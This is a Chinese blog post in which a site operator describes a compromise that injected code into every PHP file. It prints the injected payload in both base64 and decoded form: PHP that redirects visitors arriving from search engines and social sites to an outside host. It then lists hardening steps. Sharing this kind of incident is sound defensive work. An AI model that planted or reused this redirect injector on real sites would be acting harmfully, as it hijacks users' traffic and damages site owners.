2019独角兽企业重金招聘Python工程师标准>>>
昨天公司网站所有php代码文件被植入一段代码,代码的含义是将从bing和google过来的ip跳转到指定的网址,因为其中没有百度,估计是国外黑客所为。黑客,这个词听起来就让人很激动,但还是不要发生到自己身上的好,也是因为公司平台刚刚起步,还没多少用户,还好没有造成特别严重的后果,下面贴下植入的代码,以方便以后遭遇不幸的朋友参考。
base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGlvcG8uMjV1LmNvbS8iKTsKZXhpdCgpOwp9Cn0KfQp9Cn0=");
黑客使用eval方法执行base64_decode方法返回的代码串,将返回结果打印出来,是长这个样子的
error_reporting ( 0 );
$qazplm = headers_sent ();
if (! $qazplm) {$referer = $_SERVER ['HTTP_REFERER'];$uag = $_SERVER ['HTTP_USER_AGENT'];if ($uag) {if (! stristr ( $uag, "MSIE 7.0" )) {if (stristr ( $referer, "yahoo" ) or stristr ( $referer, "bing" ) or stristr ( $referer, "rambler" ) or stristr ( $referer, "gogo" ) or stristr ( $referer, "live.com" ) or stristr ( $referer, "aport" ) or stristr ( $referer, "nigma" ) or stristr ( $referer, "webalta" ) or stristr ( $referer, "begun.ru" ) or stristr ( $referer, "stumbleupon.com" ) or stristr ( $referer, "bit.ly" ) or stristr ( $referer, "tinyurl.com" ) or preg_match ( "/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer ) or preg_match ( "/google\.(.*?)\/url\?sa/", $referer ) or stristr ( $referer, "myspace.com" ) or stristr ( $referer, "facebook.com" ) or stristr ( $referer, "aol.com" )) {if (! stristr ( $referer, "cache" ) or ! stristr ( $referer, "inurl" )) {header ( "Location: http://piopo.25u.com/" );exit ();}}}}
}
我不知道是哪里出的问题,导致黑客有权限将其代码写入我所有的php文件,事后我使用360网站安全工具检测发现了一系列的问题
事后加强网站安全的一系列措施在此做个记录:
1.关闭php脚本错误提示
2.防止跨站脚本攻击漏洞,过滤用户输入的元数据
3.禁用网站目录列表功能
4.将网站代码文件夹及文件设置为只读
5.禁用apache服务器TRACE Method防止跨站脚本攻击
6.将前台所有可见php链接重写为伪静态链接,提升网站安全性和seo友好度
7.做好数据库定时备份